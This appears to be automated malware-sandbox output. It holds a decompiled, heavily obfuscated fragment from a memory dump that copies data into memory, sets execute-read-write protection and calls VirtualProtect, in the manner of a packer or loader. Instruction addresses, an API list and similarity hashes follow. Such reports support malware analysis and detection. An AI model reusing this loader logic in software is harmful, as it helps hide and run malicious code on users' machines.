						_t1507 =  *((intOrPtr*)(_t1506 + 0xc));
						if( *(_t1293 + 0x41d5fa) == 0) {
							_v84 = _v84 & 0x00000000;
							_v84 = _v84 | _t1311;
							_v88 =  *((intOrPtr*)(_t1293 + 0x41c0c4));
							_t1122 =  *((intOrPtr*)(_t1293 + 0xa901c8))(_t1121);
							 *(_t1293 + 0x41d5fa) =  *(_t1293 + 0x41d5fa) & 0x00000000;
							 *(_t1293 + 0x41d5fa) =  *(_t1293 + 0x41d5fa) ^ _t1409 & 0x00000000 ^ _t1122;
							_t1409 = _t1409;
							_t1311 = _t1311;
						}
						_t1121 = memcpy(_t1507 +  *(_t1293 + 0x41c507), _t1584, _t1311);
						_t1690 = _t1690 + 0xc;
						_t1510 = _t1584 + _t1311 + _t1311;
						_t1312 = 0;
						if( *(_t1293 + 0x41c405) == 0) {
							_t1121 =  *((intOrPtr*)(_t1293 + 0xa90140))();
							_v12 = _t1510;
							 *(_t1293 + 0x41c405) = 0 ^ _t1121;
						}
						_t1506 =  &_a36;
						_t1667 = _t1667;
						if( *(_t1293 + 0x41cb8c) == 0) {
							_v80 =  *((intOrPtr*)(_t1293 + 0x41d74b));
							_t1596 = _t1584;
							_v84 =  *((intOrPtr*)(_t1293 + 0x41d7d1));
							_t1409 = _v88;
							_v88 =  *((intOrPtr*)(_t1293 + 0x41c9a6));
							_t1138 = _v92;
							_v92 =  *((intOrPtr*)(_t1293 + 0x41c0e4));
							_t1598 = _v96;
							_v96 =  *((intOrPtr*)(_t1293 + 0x41c30e));
							 *_t1690 =  *_t1690 + 2;
							 *_t1690 =  *_t1690 - _t1138;
							_t1312 =  *_t1690;
							 *_t1690 =  *((intOrPtr*)(_t1293 + 0x41ca23));
							_t1121 =  *((intOrPtr*)(_t1293 + 0xa901bc))(_t1312, _t1138, _t1596, _v84, _t1409, _t1121, _t1584);
							_v12 = _t1598;
							 *(_t1293 + 0x41cb8c) =  *(_t1293 + 0x41cb8c) & 0x00000000;
							 *(_t1293 + 0x41cb8c) =  *(_t1293 + 0x41cb8c) | _t1598 - _v12 | _t1121;
							_t1584 = _v12;
						}
						_t1014 =  &_v8;
						 *_t1014 = _v8 - 1;
					} while ( *_t1014 != 0);
					if( *(_t1293 + 0x41d4c9) == 0) {
						_v80 =  *((intOrPtr*)(_t1293 + 0x41c6a2));
						_t1317 = _t1312;
						_t1134 =  *((intOrPtr*)(_t1293 + 0xa901c8))(_t1312);
						_v12 = _t1317;
						 *(_t1293 + 0x41d4c9) = 0 ^ _t1134;
						_t1312 = _v12;
					}
					_pop(_t1512);
					_v76 = _v76 - _t1293;
					_v76 = _v76 ^ _t1293 + 0x0041d677;
					_v80 = _v80 - _t1293;
					_v80 = _v80 | _t1293 + 0x0041d583;
					_t1125 =  *((intOrPtr*)(_t1293 + 0xa90130))(_t1293, _t1293);
					_v12 = _t1584;
					 *(_t1293 + 0x41d3bf) =  *(_t1293 + 0x41d3bf) & 0x00000000;
					 *(_t1293 + 0x41d3bf) =  *(_t1293 + 0x41d3bf) ^ (_t1584 & 0x00000000 | _t1125);
					_t1589 = _v12;
					_v12 = _t1409;
					_t1126 = 0 ^  *(_t1512 + 0x28);
					_t1414 = _v12;
					if( *((intOrPtr*)(_t1293 + 0x41c4c5)) == 0) {
						_v84 = _t1126;
						_v88 = 4;
						_t1133 =  *((intOrPtr*)(_t1293 + 0xa901b8))(_t1512, _v12);
						_v12 = _t1312;
						 *((intOrPtr*)(_t1293 + 0x41c4c5)) = _t1133;
						_t1312 = _v12;
						_t1126 = 0;
					}
					_t1127 = _t1126 +  *(_t1293 + 0x41c507);
					if( *((intOrPtr*)(_t1293 + 0x41c56b)) == 0) {
						_v12 = 0;
						_v84 = _v84 | _t1127;
						_push( *((intOrPtr*)(_t1293 + 0xa9013c))(_v12));
						_pop( *_t1046);
						_push(_v12);
						_pop( *_t1048);
						_pop(_t1127);
					}
					 *_t1049 = _t1127;
					_push(_v12);
					_pop( *_t1051);
					_v12 = _t1414;
					_t1591 = _t1589 & 0x00000000 ^ (_t1414 - _v12 |  *(_t1293 + 0x41c507));
					_t1417 = _v12;
					if( *(_t1293 + 0x41d10e) == 0) {
						_v84 =  *((intOrPtr*)(_t1293 + 0x41c282));
						_t1512 = _t1512;
						_t1127 =  *((intOrPtr*)(_t1293 + 0xa90138))(_t1417);
						 *(_t1293 + 0x41d10e) =  *(_t1293 + 0x41d10e) & 0x00000000;
						 *(_t1293 + 0x41d10e) =  *(_t1293 + 0x41d10e) ^ _t1667 - _v88 ^ _t1127;
						_t1667 = _t1667;
					}
					if(_t1591 > 0) {
						_v84 = _t1293 + 0x41d90f;
						_v12 = 0;
						_v88 = _v88 + _t1293 + 0x41c028;
						_t1130 =  *((intOrPtr*)(_t1293 + 0xa90130))(_v12, _v12);
						 *(_t1293 + 0x41d49b) =  *(_t1293 + 0x41d49b) & 0x00000000;
						 *(_t1293 + 0x41d49b) =  *(_t1293 + 0x41d49b) | _t1591 - _v92 | _t1130;
						_t1594 = _t1591;
						_v12 = _v12 & 0x00000000;
						_v92 = _v92 | _t1594; // executed
						_t1131 = E04AF1000(_t1130, _t1293, _t1417, _v12); // executed
						_v96 = _v96 & 0x00000000;
						_v96 = _v96 + _t1594;
						_t1127 = E04AF33AA(_t1131, _t1293, _t1312, _t1417, _t1512, _t1594, _t1667);
					}
					return _t1127;
				} else {
					_v84 = _t1310;
					_v88 = _v88 & 0x00000000;
					_v88 = _v88 | _t1409;
					_v92 = _v92 ^ _t1310;
					_v92 = _v92 + _t1293 + 0x41cc44;
					_t1140 =  *((intOrPtr*)(_t1293 + 0xa90128))(_t1584, _v12);
					 *(_t1293 + 0x41c5f3) =  *(_t1293 + 0x41c5f3) & 0x00000000;
					 *(_t1293 + 0x41c5f3) =  *(_t1293 + 0x41c5f3) | _t1409 ^ _v96 | _t1140;
					_t1431 = _t1409;
					_t1323 = _t1310;
					do {
						asm("movsb");
						if( *(_t1293 + 0x41cb40) == 0) {
							_v88 = _v88 - _t1504;
							_v88 = _v88 | _t1323;
							_v12 = _v12 & 0x00000000;
							_v92 = _v92 | _t1431;
							_t1140 =  *((intOrPtr*)(_t1293 + 0xa9013c))(_v12);
							 *(_t1293 + 0x41cb40) =  *(_t1293 + 0x41cb40) & 0x00000000;
							 *(_t1293 + 0x41cb40) =  *(_t1293 + 0x41cb40) ^ _t1504 - _v96 ^ _t1140;
							_t1504 = _t1504;
							_pop(_t1409);
							_t1323 = _t1504;
						}
						_t1323 = _t1323 - 1;
					} while (_t1323 != 0);
					if( *(_t1293 + 0x41d5f2) == 0) {
						_v88 = _t1409;
						_t1140 =  *((intOrPtr*)(_t1293 + 0xa90110))(_v12);
						_v12 = _t1584;
						 *(_t1293 + 0x41d5f2) = 0 ^ _t1140;
						_t1584 = _v12;
						_pop(_t1409);
					}
					 *_t889 =  *(_t1293 + 0x41c507);
					_push(_v12);
					_pop(_t1524);
					if( *(_t1293 + 0x41cd13) == 0) {
						_v12 = 0;
						_v88 = _v88 ^ _t1409;
						_v92 =  *((intOrPtr*)(_t1293 + 0x41d62c));
						_t1146 =  *((intOrPtr*)(_t1293 + 0xa901c8))(_t1140, _v12);
						 *(_t1293 + 0x41cd13) =  *(_t1293 + 0x41cd13) & 0x00000000;
						 *(_t1293 + 0x41cd13) =  *(_t1293 + 0x41cd13) | _t1584 & 0x00000000 ^ _t1146;
						_t1584 = _t1584;
						_t1409 = _t1409;
					}
					 *(_t1293 + 0x41c6cd) = 0x40;
					if( *(_t1293 + 0x41cde4) == 0) {
						_v88 = _v88 & 0x00000000;
						_v88 = _v88 ^ _t1409;
						_t1144 = _t1293 + 0x41ca0b;
						_v92 = _v92 ^ _t1584;
						_v92 = _v92 | _t1144;
						 *_t1144 = 0x14;
						_t1145 =  *((intOrPtr*)(_t1293 + 0xa901c4))(_t1323);
						_v96 = _t1667;
						 *(_t1293 + 0x41cde4) = 0 ^ _t1145;
						_t1667 = 0;
						_t1409 = _t1584;
					}
					_t1141 = _t1293 + 0x41c6cd;
					if( *(_t1293 + 0x41d54c) == 0) {
						_v88 = _v88 ^ _t1323;
						_v88 = _v88 + _t1141;
						_v92 = _t1409;
						_v96 =  *((intOrPtr*)(_t1293 + 0x41d890));
						_t1524 = _t1524;
						_t1143 =  *((intOrPtr*)(_t1293 + 0xa90138))(_v12, _t1323);
						 *(_t1293 + 0x41d54c) =  *(_t1293 + 0x41d54c) & 0x00000000;
						 *(_t1293 + 0x41d54c) =  *(_t1293 + 0x41d54c) | _t1409 -  *_t1690 | _t1143;
						_t1409 = _t1409;
						_t1141 = _t1323;
					}
					_push(_t1323);
					_v88 = _v88 & 0x00000000;
					_v88 = _v88 | _t1141;
					_push(_t1409);
					_v92 = 2;
					if( *(_t1293 + 0x41c8de) == 0) {
						_v96 = _v96 & 0x00000000;
						_v96 = _v96 ^ _t1409;
						_t1584 =  *_t1690;
						 *_t1690 =  *((intOrPtr*)(_t1293 + 0x41cbeb));
						_t1141 =  *((intOrPtr*)(_t1293 + 0xa90138))(_t1584);
						_v12 = _t1409;
						 *(_t1293 + 0x41c8de) =  *(_t1293 + 0x41c8de) & 0x00000000;
						 *(_t1293 + 0x41c8de) =  *(_t1293 + 0x41c8de) ^ _t1409 ^ _v12 ^ _t1141;
						_t1409 = _t1584;
					}
					_push(_t1293);
					_v96 = _v96 ^ _t1293;
					_v96 = _v96 ^ _t1409;
					_push(_t1141);
					 *_t1690 =  *_t1690 - _t1141;
					 *_t1690 =  *_t1690 | _t1524;
					if( *(_t1293 + 0x41d946) == 0) {
						_t1142 =  *((intOrPtr*)(_t1293 + 0xa90140))();
						 *(_t1293 + 0x41d946) =  *(_t1293 + 0x41d946) & 0x00000000;
						 *(_t1293 + 0x41d946) =  *(_t1293 + 0x41d946) | _t1584 -  *_t1690 | _t1142;
						_t1584 = _t1584; // executed
					}
					_t1118 = VirtualProtect();
					goto L153;
				}
			}

0x04af3f1c
0x04af3f1c
0x04af3f1c
0x04af3f1c
0x04af3f1c
0x04af3f1c
0x04af3f1d
0x04af3f21
0x04af3f24
0x04af3f26
0x04af3f30
0x04af3f32
0x04af3f35
0x04af3f38
0x04af3f3c
0x04af3f3f
0x04af3f42
0x04af3f43
0x04af3f47
0x04af3f4a
0x04af3f50
0x04af3f56
0x04af3f5d
0x04af3f63
0x04af3f64
0x04af3f65
0x04af3f65
0x04af3f6d
0x04af404a
0x04af404e
0x04af4051
0x04af405e
0x04af4060
0x04af406a
0x04af4074
0x04af407e
0x04af4088
0x04af408c
0x04af409a
0x04af409a
0x04af40a5
0x04af40a9
0x04af40b2
0x04af40b6
0x04af40bd
0x04af40be
0x04af40c1
0x04af40c4
0x04af40ca
0x04af40ca
0x04af40cc
0x04af40cf
0x04af40d2
0x04af40df
0x04af40e9
0x04af40ed
0x04af40f0
0x04af40f6
0x04af40fe
0x04af4105
0x04af410b
0x04af410b
0x04af410e
0x04af4116
0x04af4118
0x04af411f
0x04af4129
0x04af4133
0x04af4133
0x04af4137
0x04af4146
0x04af414a
0x04af4153
0x04af4157
0x04af415f
0x04af415f
0x04af416a
0x04af416e
0x04af416f
0x04af4175
0x04af417c
0x04af4182
0x04af4185
0x04af4185
0x04af4186
0x04af418e
0x04af4191
0x04af4194
0x04af419a
0x04af419d
0x04af41a4
0x04af41a7
0x04af41aa
0x04af41b0
0x04af41b1
0x04af41b1
0x04af418e
0x04af41b9
0x04af41c6
0x04af41c8
0x04af41cf
0x04af41d2
0x04af41d5
0x04af41d9
0x04af41dc
0x04af41e6
0x04af41e9
0x04af41f8
0x04af41fe
0x04af41ff
0x04af4200
0x04af4200
0x04af4208
0x04af4215
0x04af4217
0x04af4221
0x04af4224
0x04af422b
0x04af4236
0x04af423b
0x04af4247
0x04af424e
0x04af4254
0x04af4255
0x04af4256
0x04af4256
0x04af4257
0x04af4258
0x04af425c
0x04af4266
0x04af4269
0x04af426d
0x04af4270
0x04af4276
0x04af427d
0x04af4286
0x04af4286
0x04af4288
0x04af428c
0x04af4297
0x04af429a
0x04af429d
0x04af42a4
0x04af42a7
0x04af42b0
0x04af42ba
0x04af42bd
0x04af42c3
0x04af42c4
0x04af42c6
0x04af42dc
0x04af42e4
0x04af42ee
0x04af42f7
0x04af42fe
0x04af4301
0x04af4301
0x04af430d
0x04af4314
0x04af431a
0x04af431b
0x04af4321
0x04af4328
0x04af432e
0x04af4338
0x04af4342
0x04af4346
0x04af4347
0x04af4353
0x04af435a
0x04af4360
0x04af4360
0x04af4361
0x04af4369
0x04af436c
0x04af4370
0x04af4373
0x04af437b
0x04af4382
0x04af4388
0x04af4389
0x04af4389
0x04af438a
0x04af438b
0x04af4392
0x04af4395
0x04af439c
0x04af43a8
0x04af43b2
0x04af43b5
0x04af43b8
0x04af43c4
0x04af43cb
0x04af43d2
0x04af43d3
0x04af43d3
0x04af43d4
0x04af43d7
0x04af43da
0x04af43dd
0x04af43e7
0x04af43ea
0x04af43f6
0x04af43fd
0x04af4403
0x04af4403
0x04af440a
0x04af4411
0x04af441a
0x04af4421
0x04af4424
0x04af442b
0x04af442e
0x04af4437
0x04af443e
0x04af4441
0x04af4447
0x04af4448
0x04af444a
0x04af4459
0x04af4460
0x04af4469
0x04af446d
0x04af4476
0x04af447d
0x04af4480
0x04af4480
0x04af448c
0x04af4493
0x04af4499
0x04af449a
0x04af44a7
0x04af44a9
0x04af44b0
0x04af44b4
0x04af44b8
0x04af44bb
0x04af44c1
0x04af44c9
0x04af44d0
0x04af44d6
0x04af44d9
0x04af44d9
0x04af44e0
0x04af44e7
0x04af44ed
0x04af44ee
0x04af44f6
0x04af44f8
0x04af4502
0x04af450b
0x04af450c
0x04af450f
0x04af4512
0x04af4518
0x04af4518
0x04af4519
0x04af4520
0x04af4529
0x04af4530
0x04af4533
0x04af453c
0x04af4545
0x04af454c
0x04af454f
0x04af4555
0x04af4556
0x04af4558
0x04af455e
0x04af4561
0x04af4564
0x04af4567
0x04af456f
0x04af4576
0x04af4582
0x04af4585
0x04af4585
0x04af458b
0x04af4593
0x04af459a
0x04af45a0
0x04af45aa
0x04af45b3
0x04af45bd
0x04af45c8
0x04af45c9
0x04af45cc
0x04af45cf
0x04af45cf
0x04af45d5
0x04af45e2
0x04af45e7
0x04af45f1
0x04af45f1
0x04af45f4
0x04af4600
0x04af4607
0x04af460d
0x04af460e
0x04af460e
0x04af460f
0x04af4616
0x04af461c
0x04af461c
0x04af4626
0x04af4626
0x04af4630
0x04af4634
0x04af4637
0x04af463e
0x04af4641
0x04af464d
0x04af4650
0x04af4656
0x04af4657
0x04af4659
0x04af4668
0x04af466a
0x04af466f
0x04af4678
0x04af467b
0x04af4685
0x04af4689
0x04af468c
0x04af468c
0x04af4692
0x04af469a
0x04af46a1
0x04af46a7
0x04af46aa
0x04af46b7
0x04af46c4
0x04af46c9
0x04af46d4
0x04af46d8
0x04af46d9
0x04af46df
0x04af46e7
0x04af46ee
0x04af46f4
0x04af46f7
0x04af46f7
0x04af46f8
0x04af46f9
0x04af46fc
0x04af4706
0x04af470f
0x04af4713
0x04af471b
0x04af4722
0x04af472d
0x04af4731
0x04af4739
0x04af4743
0x04af4743
0x04af4748
0x04af474e
0x04af4755
0x04af475b
0x04af475b
0x04af475e
0x04af4764
0x04af476c
0x04af4773
0x04af4779
0x04af4783
0x04af478c
0x04af478c
0x04af478f
0x04af4795
0x04af479d
0x04af47a4
0x04af47aa
0x04af47ad
0x04af47b5
0x04af47b7
0x04af47be
0x04af47c9
0x04af47cd
0x04af47ce
0x04af47da
0x04af47e1
0x04af47e7
0x04af47e8
0x04af47e8
0x04af47b5
0x04af47ef
0x04af47f6
0x04af47fc
0x04af47fd
0x04af47fe
0x04af4808
0x04af4812
0x04af4815
0x04af4821
0x04af4824
0x04af482a
0x04af4832
0x04af4839
0x04af4842
0x04af484a
0x04af4857
0x04af485a
0x04af485d
0x04af4861
0x04af4865
0x04af486a
0x04af4876
0x04af487d
0x04af4883
0x04af4884
0x04af4884
0x04af4886
0x04af488a
0x04af488d
0x04af489a
0x04af489f
0x04af48aa
0x04af48ae
0x04af48b5
0x04af48b6
0x04af48b9
0x04af48bc
0x04af48c2
0x04af48c2
0x04af48c3
0x04af48cb
0x04af48d2
0x04af48d8
0x04af48e1
0x04af48e8
0x04af48eb
0x04af48f7
0x04af48fe
0x04af4905
0x04af4905
0x04af4906
0x04af490e
0x04af4910
0x04af491a
0x04af491d
0x04af4927
0x04af492a
0x04af4930
0x04af4938
0x04af493f
0x04af4945
0x04af4948
0x04af4949
0x04af4949
0x04af4951
0x04af495e
0x04af4961
0x04af4965
0x04af4969
0x04af496d
0x04af4970
0x04af4976
0x04af497d
0x04af4986
0x04af4987
0x04af4987
0x04af4989
0x04af498c
0x04af4990
0x04af4993
0x04af499c
0x04af49a6
0x04af49a9
0x04af49af
0x04af49b6
0x04af49c0
0x04af49c4
0x04af49c7
0x04af49cd
0x04af49ce
0x04af49d0
0x04af49df
0x04af49e1
0x04af49e6
0x04af49f1
0x04af49fb
0x04af49ff
0x04af4a02
0x04af4a02
0x04af4a08
0x04af4a0f
0x04af4a15
0x04af4a20
0x04af4a24
0x04af4a25
0x04af4a32
0x04af4a34
0x04af4a3e
0x04af4a49
0x04af4a4d
0x04af4a55
0x04af4a55
0x04af4a60
0x04af4a66
0x04af4a6a
0x04af4a74
0x04af4a78
0x04af4a7c
0x04af4a86
0x04af4a86
0x04af4a89
0x04af4a8f
0x04af4a97
0x04af4a9e
0x04af4aa4
0x04af4aa7
0x04af4aa7
0x04af4aae
0x04af4ab5
0x04af4abb
0x04af4ac3
0x04af4ac6
0x04af4acd
0x04af4ad3
0x04af4ada
0x04af4ae0
0x04af4ae0
0x04af4ae3
0x04af4aeb
0x04af4aed
0x04af4af4
0x04af4aff
0x04af4b06
0x04af4b0c
0x04af4b13
0x04af4b19
0x04af4b1c
0x04af4b1c
0x04af4b1d
0x04af4b25
0x04af4b2a
0x04af4b2d
0x04af4b34
0x04af4b37
0x04af4b43
0x04af4b4a
0x04af4b51
0x04af4b52
0x04af4b52
0x04af4b25
0x04af4951
0x04af4b53
0x04af4b56
0x04af4b60
0x04af4b6d
0x04af4b70
0x04af4b73
0x04af4b76
0x04af4b7d
0x04af4b80
0x04af4b86
0x04af4b8d
0x04af4b93
0x04af4b96
0x04af4b96
0x04af4b9e
0x04af4bab
0x04af4bae
0x04af4bb2
0x04af4bbb
0x04af4bbc
0x04af4bbf
0x04af4bc2
0x04af4bc8
0x04af4bc8
0x04af4bc9
0x04af4bcd
0x04af4bd0
0x04af4bd3
0x04af4be0
0x04af4be3
0x04af4be6
0x04af4be9
0x04af4bef
0x04af4bf7
0x04af4bfe
0x04af4c04
0x04af4c07
0x04af4c07
0x04af4c08
0x04af4c09
0x04af4c0d
0x04af4c10
0x04af4c1d
0x04af4c1f
0x04af4c2b
0x04af4c32
0x04af4c38
0x04af4c38
0x04af4c39
0x04af4c46
0x04af4c49
0x04af4c4c
0x04af4c56
0x04af4c56
0x04af4c5f
0x04af4c60
0x04af4c63
0x04af4c66
0x04af4c6c
0x04af4c6c
0x04af4c6f
0x04af4c76
0x04af4c7c
0x04af4c84
0x04af4c8d
0x04af4c90
0x04af4c96
0x04af4c9e
0x04af4ca5
0x04af4cab
0x04af4cae
0x04af4cae
0x04af4caf
0x04af4cb0
0x04af4cb3
0x04af4cbd
0x04af4cbf
0x04af4ccb
0x04af4cd2
0x04af4cd8
0x04af4cd8
0x04af4cd9
0x04af4cda
0x04af4ce8
0x04af4cf1
0x04af4cf4
0x04af4d00
0x04af4d07
0x04af4d0d
0x04af4d0d
0x04af4d0e
0x04af4d14
0x04af4d1c
0x04af4d23
0x04af4d29
0x04af4d29
0x04af4d2c
0x04af4d35
0x04af4d3f
0x04af4d43
0x04af4d44
0x04af4d4c
0x04af4d53
0x04af4d59
0x04af4d59
0x04af4d5a
0x04af4d60
0x04af4d68
0x04af4d6f
0x04af4d75
0x04af4d7f
0x04af4d84
0x04af4d8e
0x04af4d98
0x04af4d98
0x04af4d9c
0x04af4daa
0x04af4db5
0x04af4dbb
0x04af4dca
0x04af4dce
0x04af4dcf
0x04af4dd5
0x04af4ddd
0x04af4de4
0x04af4dea
0x04af4ded
0x04af4ded
0x04af4dee
0x04af4df6
0x04af4df8
0x04af4dff
0x04af4e02
0x04af4e0c
0x04af4e16
0x04af4e1f
0x04af4e20
0x04af4e23
0x04af4e26
0x04af4e2c
0x04af4e2d
0x04af4e2d
0x04af4df6
0x04af4e2e
0x04af4e38
0x04af4e3e
0x04af4e48
0x04af4e4b
0x04af4e4e
0x04af4e56
0x04af4e5d
0x04af4e63
0x04af4e64
0x04af4e6c
0x04af4e73
0x04af4e77
0x04af4e81
0x04af4e84
0x04af4e87
0x04af4e93
0x04af4e9a
0x04af4ea0
0x04af4ea1
0x04af4ea2
0x04af4ea6
0x04af4ea9
0x04af4eb3
0x04af4eb5
0x04af4ebb
0x04af4ec2
0x04af4ec8
0x04af4ec8
0x04af4ecb
0x04af4ed8
0x04af4edb
0x04af4ede
0x04af4ee4
0x04af4ee7
0x04af4ef3
0x04af4efa
0x04af4f00
0x04af4f01
0x04af4f01
0x04af4f08
0x04af4f0f
0x04af4f15
0x04af4f1c
0x04af4f23
0x04af4f2f
0x04af4f32
0x04af4f3a
0x04af4f41
0x04af4f47
0x04af4f47
0x04af4f4a
0x04af4f52
0x04af4f54
0x04af4f5c
0x04af4f5e
0x04af4f65
0x04af4f68
0x04af4f6e
0x04af4f76
0x04af4f7d
0x04af4f83
0x04af4f86
0x04af4f86
0x04af4f87
0x04af4f8a
0x04af4f8d
0x04af4f9a
0x04af4f9d
0x04af4fa0
0x04af4fa3
0x04af4faf
0x04af4fb6
0x04af4fbc
0x04af4fbd
0x04af4fbd
0x04af4fbe
0x04af4fc1
0x04af4fcb
0x04af4fd4
0x04af4fd4
0x04af4fd8
0x04af4fdf
0x04af4fea
0x04af4fee
0x04af4ff6
0x04af5001
0x04af5005
0x04af500e
0x04af5012
0x04af5015
0x04af5021
0x04af5028
0x04af502e
0x04af502e
0x04af502f
0x04af503c
0x04af503f
0x04af5043
0x04af504d
0x04af504d
0x04af5058
0x04af505d
0x04af5063
0x04af506b
0x04af5072
0x04af5078
0x04af507b
0x04af507b
0x04af507f
0x04af5082
0x04af508f
0x04af5092
0x04af5096
0x04af50a1
0x04af50a5
0x04af50a6
0x04af50ae
0x04af50b5
0x04af50bb
0x04af50bc
0x04af50bc
0x04af50bf
0x04af50c6
0x04af50cc
0x04af50cd
0x04af50ce
0x04af50d1
0x04af50db
0x04af50e1
0x04af50eb
0x04af50ee
0x04af50f1
0x04af50f7
0x04af50fe
0x04af5107
0x04af510e
0x04af5111
0x04af5117
0x04af511c
0x04af5127
0x04af5129
0x04af512c
0x04af5134
0x04af513b
0x04af5145
0x04af5149
0x04af5152
0x04af5153
0x04af5156
0x04af5159
0x04af5159
0x04af515f
0x04af5160
0x04af516b
0x04af516d
0x04af5177
0x04af5181
0x04af5185
0x04af518d
0x04af5191
0x04af519f
0x04af51aa
0x04af51ae
0x04af51b7
0x04af51c3
0x04af51c3
0x04af51cc
0x04af51cd
0x04af51d0
0x04af51d3
0x04af51d3
0x04af51de
0x04af51e1
0x04af51ed
0x04af51f0
0x04af51f7
0x04af51fb
0x04af5204
0x04af520e
0x04af5211
0x04af5217
0x04af5227
0x04af5229
0x04af522c
0x04af5235
0x04af5238
0x04af5242
0x04af5245
0x04af5248
0x04af5254
0x04af525b
0x04af5261
0x04af5261
0x04af5262
0x04af5269
0x04af526d
0x04af5270
0x04af5271
0x04af5272
0x04af5275
0x04af527f
0x04af5281
0x04af528a
0x04af528d
0x04af5293
0x04af5299
0x04af52a0
0x04af52a6
0x04af52a9
0x04af52b1
0x04af52b3
0x04af52b7
0x04af52ba
0x04af52c3
0x04af52ca
0x04af52cd
0x04af52d4
0x04af52d7
0x04af52e0
0x04af52ea
0x04af52ed
0x04af52f3
0x04af52f4
0x04af5303
0x04af5305
0x04af5308
0x04af5313
0x04af531d
0x04af5321
0x04af5324
0x04af532a
0x04af5332
0x04af5339
0x04af533f
0x04af5342
0x04af5350
0x04af5353
0x04af535d
0x04af5366
0x04af536d
0x04af5377
0x04af537b
0x04af537e
0x04af5385
0x04af5388
0x04af538b
0x04af5391
0x04af5392
0x04af539e
0x04af53a0
0x04af53aa
0x04af53ac
0x04af53b3
0x04af53b6
0x04af53c2
0x04af53c9
0x04af53cf
0x04af53d0
0x04af53d0
0x04af53d1
0x04af53d8
0x04af53dd
0x04af53e7
0x04af53ed
0x04af53f7
0x04af53fa
0x04af53fd
0x04af5404
0x04af5407
0x04af5410
0x04af541a
0x04af541d
0x04af5423
0x04af5424
0x04af5433
0x04af5435
0x04af5438
0x04af5441
0x04af5445
0x04af544f
0x04af5453
0x04af5456
0x04af545d
0x04af5460
0x04af5463
0x04af5463
0x04af5469
0x04af546a
0x04af546d
0x04af5660
0x04af5660
0x04af5668
0x04af566a
0x04af5672
0x04af5679
0x04af567f
0x04af567f
0x04af5689
0x04af568b
0x04af5693
0x04af5695
0x04af569d
0x04af56a4
0x04af56aa
0x04af56aa
0x04af56ab
0x04af56ab
0x04af56af
0x04af56b2
0x04af56bf
0x04af56c1
0x04af56c9
0x04af56cc
0x04af56da
0x04af56da
0x04af56dd
0x04af56e9
0x04af56f0
0x04af56f6
0x04af56f6
0x04af56fa
0x04af56fd
0x04af5700
0x04af5708
0x04af570a
0x04af5711
0x04af571c
0x04af5720
0x04af5729
0x04af572d
0x04af572e
0x04af5734
0x04af573b
0x04af5741
0x04af5744
0x04af5744
0x04af5745
0x04af574f
0x04af5751
0x04af575b
0x04af575e
0x04af5764
0x04af576c
0x04af5773
0x04af5779
0x04af577c
0x04af577c
0x04af577d
0x04af5787
0x04af578a
0x04af578e
0x04af5798
0x04af579b
0x04af57a7
0x04af57ae
0x04af57b4
0x04af57b5
0x04af57b5
0x04af57bc
0x04af57bc
0x04af57bc
0x04af57bc
0x04af57c5
0x04af57c7
0x04af57cd
0x04af57d4
0x04af57da
0x04af57e7
0x04af57e9
0x04af57f1
0x04af57fb
0x04af57ff
0x04af5807
0x04af5811
0x04af5811
0x04af581b
0x04af581b
0x04af5825
0x04af5825
0x04af5829
0x04af582d
0x04af5837
0x04af5837
0x04af583a
0x04af5840
0x04af5848
0x04af584f
0x04af5855
0x04af5855
0x04af5858
0x04af5858
0x04af5858
0x04af5868
0x04af5872
0x04af5876
0x04af5877
0x04af587d
0x04af5884
0x04af588a
0x04af588a
0x04af588d
0x04af5895
0x04af5898
0x04af58a2
0x04af58a5
0x04af58a8
0x04af58ae
0x04af58b6
0x04af58bd
0x04af58c3
0x04af58c6
0x04af58ce
0x04af58d0
0x04af58da
0x04af58df
0x04af58e3
0x04af58ec
0x04af58f2
0x04af58f9
0x04af58ff
0x04af5902
0x04af5902
0x04af5903
0x04af5910
0x04af5912
0x04af591c
0x04af5925
0x04af5926
0x04af5929
0x04af592c
0x04af5932
0x04af5932
0x04af5934
0x04af5937
0x04af593a
0x04af5940
0x04af594f
0x04af5951
0x04af595b
0x04af5965
0x04af5969
0x04af596a
0x04af5976
0x04af597d
0x04af5983
0x04af5983
0x04af5987
0x04af5992
0x04af599b
0x04af59a5
0x04af59a8
0x04af59b4
0x04af59bb
0x04af59c1
0x04af59c2
0x04af59c9
0x04af59cc
0x04af59d2
0x04af59d6
0x04af59d9
0x04af59d9
0x04af59e1
0x04af5473
0x04af5476
0x04af547a
0x04af547e
0x04af5488
0x04af548b
0x04af548e
0x04af549a
0x04af54a1
0x04af54a8
0x04af54a9
0x04af54aa
0x04af54aa
0x04af54b2
0x04af54b5
0x04af54b8
0x04af54bb
0x04af54c2
0x04af54c5
0x04af54d1
0x04af54d8
0x04af54de
0x04af54df
0x04af54e0
0x04af54e0
0x04af54e1
0x04af54e1
0x04af54eb
0x04af54f0
0x04af54f3
0x04af54f9
0x04af5500
0x04af5506
0x04af5509
0x04af5509
0x04af5510
0x04af5513
0x04af5516
0x04af551e
0x04af5520
0x04af552a
0x04af5535
0x04af553a
0x04af5546
0x04af554d
0x04af5553
0x04af5554
0x04af5554
0x04af5555
0x04af5566
0x04af5569
0x04af556d
0x04af5570
0x04af5577
0x04af557a
0x04af557d
0x04af5583
0x04af558b
0x04af5592
0x04af5598
0x04af5599
0x04af5599
0x04af559a
0x04af55a7
0x04af55aa
0x04af55ad
0x04af55b3
0x04af55be
0x04af55c2
0x04af55c3
0x04af55cf
0x04af55d6
0x04af55dd
0x04af55de
0x04af55de
0x04af55df
0x04af55e0
0x04af55e4
0x04af55e7
0x04af55e8
0x04af55f6
0x04af55f9
0x04af55fd
0x04af5607
0x04af5607
0x04af560a
0x04af5610
0x04af5618
0x04af561f
0x04af5628
0x04af5628
0x04af5629
0x04af562a
0x04af562d
0x04af5630
0x04af5631
0x04af5634
0x04af563e
0x04af5640
0x04af564c
0x04af5653
0x04af5659
0x04af5659
0x04af565a
0x00000000
0x04af565a

APIs

GetProcessId.KERNELBASE(?,00000000,00000000), ref: 04AF41E9
GetProcessId.KERNELBASE(?,?,?), ref: 04AF46AA
GetProcessId.KERNELBASE(00000000,?,00000000,?), ref: 04AF4C90
VirtualProtect.KERNELBASE(?,?,?,?,?), ref: 04AF565A

Memory Dump Source

Source File: 00000005.00000002.812972364.0000000004AF0000.00000040.00000001.sdmp, Offset: 04AF0000, based on PE: true

Similarity

API ID: Process$ProtectVirtual
String ID:
API String ID: 2904406289-0
Opcode ID: 6ee8f51e613eaef717c6bf70aa5e8ec27986d2ca59d295a1796ee4509976c97d
Instruction ID: 7d5597f40e42a9558e09077e91887dc2ff67c94d1800168e51c4af03393de102
